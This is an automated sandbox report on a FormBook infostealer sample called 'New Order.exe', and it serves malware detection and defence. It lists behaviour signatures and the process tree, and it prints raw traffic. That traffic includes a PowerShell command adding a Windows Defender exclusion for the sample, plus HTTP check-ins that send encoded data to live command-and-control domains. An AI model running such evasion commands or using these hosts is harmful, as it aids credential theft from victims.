Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order.exe

Overview

General Information

Sample name:New Order.exe
Analysis ID:1633466
MD5:3bfdf4ebc873d0b4beefe9c37486bae6
SHA1:c07522e9f1497df65771d960f9a0c68d70e2fdff
SHA256:319fff87d2654e260489db6ed6065d73aef9b0ae8435b2f9b79ececb32a77fb9
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Order.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 3BFDF4EBC873D0B4BEEFE9C37486BAE6)
    • powershell.exe (PID: 7984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8004 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • 9WAxm5F77VClmSoGxi.exe (PID: 6460 cmdline: "C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\x1D8hvkm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • PresentationHost.exe (PID: 5764 cmdline: "C:\Windows\SysWOW64\PresentationHost.exe" MD5: C6671F8B9F073785FD617661AD1F1C45)
          • 9WAxm5F77VClmSoGxi.exe (PID: 6524 cmdline: "C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\IizTogBbJ.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 3172 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000F.00000002.2432752238.0000000000600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.1679205538.00000000012B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.1677471909.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000D.00000002.2433546619.0000000004E40000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.1679654873.0000000003190000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            8.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 7592, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 7984, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 7592, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 7984, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 7592, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 7984, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-10T11:58:15.674009+010020507451Malware Command and Control Activity Detected192.168.2.44972977.95.113.18280TCP
                2025-03-10T11:58:39.148148+010020507451Malware Command and Control Activity Detected192.168.2.44973451.222.255.20780TCP
                2025-03-10T11:58:52.490401+010020507451Malware Command and Control Activity Detected192.168.2.449738104.21.18.4580TCP
                2025-03-10T11:59:05.934244+010020507451Malware Command and Control Activity Detected192.168.2.449742203.161.42.7380TCP
                2025-03-10T11:59:20.513274+010020507451Malware Command and Control Activity Detected192.168.2.449746142.0.133.14980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-10T11:58:31.263701+010028554641A Network Trojan was detected192.168.2.44973051.222.255.20780TCP
                2025-03-10T11:58:33.838980+010028554641A Network Trojan was detected192.168.2.44973251.222.255.20780TCP
                2025-03-10T11:58:36.405049+010028554641A Network Trojan was detected192.168.2.44973351.222.255.20780TCP
                2025-03-10T11:58:44.792590+010028554641A Network Trojan was detected192.168.2.449735104.21.18.4580TCP
                2025-03-10T11:58:47.333535+010028554641A Network Trojan was detected192.168.2.449736104.21.18.4580TCP
                2025-03-10T11:58:49.978624+010028554641A Network Trojan was detected192.168.2.449737104.21.18.4580TCP
                2025-03-10T11:58:58.131737+010028554641A Network Trojan was detected192.168.2.449739203.161.42.7380TCP
                2025-03-10T11:59:00.733754+010028554641A Network Trojan was detected192.168.2.449740203.161.42.7380TCP
                2025-03-10T11:59:03.335831+010028554641A Network Trojan was detected192.168.2.449741203.161.42.7380TCP
                2025-03-10T11:59:12.316778+010028554641A Network Trojan was detected192.168.2.449743142.0.133.14980TCP
                2025-03-10T11:59:14.870099+010028554641A Network Trojan was detected192.168.2.449744142.0.133.14980TCP
                2025-03-10T11:59:17.419110+010028554641A Network Trojan was detected192.168.2.449745142.0.133.14980TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: New Order.exeAvira: detected
                Source: New Order.exeReversingLabs: Detection: 55%
                Source: New Order.exeVirustotal: Detection: 59%Perma Link
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2432752238.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679205538.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1677471909.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2433546619.0000000004E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679654873.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: New Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Order.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: PresentationHost.pdbGCTL source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000003.1625113252.0000000001324000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000E.00000002.2438416479.0000000004BCC000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.000000000241C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1963615507.000000001EBEC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1678088393.0000000000F60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1678088393.0000000000F60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationHost.pdb source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000003.1625113252.0000000001324000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000E.00000002.2438416479.0000000004BCC000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.000000000241C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1963615507.000000001EBEC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000000.1598722649.00000000005DF000.00000002.00000001.01000000.0000000D.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000000.1746838226.00000000005DF000.00000002.00000001.01000000.0000000D.sdmp
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 4x nop then pop edi14_2_002BE980
                Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 4x nop then mov ebx, dword ptr [ebp+08h]14_2_002D4179
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 4x nop then pop edi15_2_006426EA
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 4x nop then pop edi15_2_00644760
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeCode function: 4x nop then xor eax, eax15_2_00647F4B
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h16_2_0000022C1E9FE4DE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49734 -> 51.222.255.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49730 -> 51.222.255.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 142.0.133.149:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49733 -> 51.222.255.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49732 -> 51.222.255.207:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49746 -> 142.0.133.149:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49729 -> 77.95.113.182:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 142.0.133.149:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 104.21.18.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49735 -> 104.21.18.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49736 -> 104.21.18.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 142.0.133.149:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49738 -> 104.21.18.45:80
                Source: DNS query: www.79456217.xyz
                Source: Joe Sandbox ViewIP Address: 142.0.133.149 142.0.133.149
                Source: Joe Sandbox ViewIP Address: 203.161.42.73 203.161.42.73
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /aoc3/?ch=ENVuXSwqVK4LLJ4bV1ZPNpNHllh6tIMu0UDTRKKNf697foRm0cYEZ1DAoMd0qHiAIGHFieBWVgv/TRDvXeOl/Y7+QOq+siVAyTU6uEP6mIDa1u4fFD7FLl8=&_tlHk=JrClDd5H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.sixfiguredigital.groupConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:35.0) Gecko/20100101 Firefox/35.0
                Source: global trafficHTTP traffic detected: GET /d70e/?ch=l5xQA5K4b7aqfogs89hLFhjKsCHXLAQyo6Xr1d/5ybb5OsrKimt0hea7nMwmYGsyz9DiR+F2IdsEY8sqakHWKjkXWyYv+zJPyxGI6Ut+uWbGrsphkgl2JJU=&_tlHk=JrClDd5H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.playav.mobiConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:35.0) Gecko/20100101 Firefox/35.0
                Source: global trafficHTTP traffic detected: GET /i449/?_tlHk=JrClDd5H&ch=o6aNrPJ8Vgz7qr0n2JZW/7oWDU2mP6EA5dfKdpZrkUJWipFpw/MtjZu4OErTJsSr7rDGASsMPw9ZK2KHHuFx2g8W5ha3Q6M6e22CUDpsBIGP4TNStKDHKyo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.eedpisalgenius.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:35.0) Gecko/20100101 Firefox/35.0
                Source: global trafficHTTP traffic detected: GET /04t4/?ch=z3mRD9CpBO+9TEsCgaevLDuqSAgZSRcKFRU8DceMFbMfFgTaDd0hbIYWywfeaTrgjghZEseGMRK0IE2XxKDTRY48EgRD3PrXiG1CT+NcgLL8qaaAfo2XbfM=&_tlHk=JrClDd5H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.thrivay.websiteConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:35.0) Gecko/20100101 Firefox/35.0
                Source: global trafficHTTP traffic detected: GET /q7ap/?ch=2QcLCv3cch7dZL7vkyqSODUavBfutFJT267zkT/xic4HTOjDb+i+cbqxNFfPkyyXEtlXhdON3BxQ/RTEtYdDaTwNr3dR6boWj/YrKQZQXn/ypOqR4YwLt6E=&_tlHk=JrClDd5H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.79456217.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:35.0) Gecko/20100101 Firefox/35.0
                Source: global trafficDNS traffic detected: DNS query: www.sixfiguredigital.group
                Source: global trafficDNS traffic detected: DNS query: www.playav.mobi
                Source: global trafficDNS traffic detected: DNS query: www.eedpisalgenius.shop
                Source: global trafficDNS traffic detected: DNS query: www.thrivay.website
                Source: global trafficDNS traffic detected: DNS query: www.79456217.xyz
                Source: unknownHTTP traffic detected: POST /d70e/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.playav.mobiContent-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.playav.mobiReferer: http://www.playav.mobi/d70e/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:35.0) Gecko/20100101 Firefox/35.0Data Raw: 63 68 3d 6f 37 5a 77 44 4e 47 6f 64 4d 75 53 53 73 73 35 70 59 74 31 44 42 6e 42 71 51 32 54 50 47 39 4a 74 5a 36 41 32 63 4c 41 79 5a 71 65 4f 39 32 6b 7a 47 51 6b 71 49 4b 6f 67 63 30 4b 53 58 73 70 32 74 48 67 41 4f 52 2f 43 4d 41 46 63 4d 59 49 46 52 75 4a 65 6b 49 77 55 51 5a 36 78 7a 49 49 33 78 2b 75 39 57 31 76 78 67 48 39 6b 66 52 43 67 44 34 68 53 61 2b 70 4a 68 43 33 63 6e 70 31 58 78 61 68 76 54 5a 56 6f 57 57 4b 72 58 30 66 50 5a 77 72 65 35 57 58 4d 45 6f 4c 54 6b 7a 30 4e 39 63 38 39 38 55 76 2f 77 79 47 33 71 4f 55 6d 41 54 46 53 4e 77 55 70 78 65 33 7a 58 56 39 6e 67 3d 3d Data Ascii: ch=o7ZwDNGodMuSSss5pYt1DBnBqQ2TPG9JtZ6A2cLAyZqeO92kzGQkqIKogc0KSXsp2tHgAOR/CMAFcMYIFRuJekIwUQZ6xzII3x+u9W1vxgH9kfRCgD4hSa+pJhC3cnp1XxahvTZVoWWKrX0fPZwre5WXMEoLTkz0N9c898Uv/wyG3qOUmATFSNwUpxe3zXV9ng==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 10 Mar 2025 10:58:15 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:58:31 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 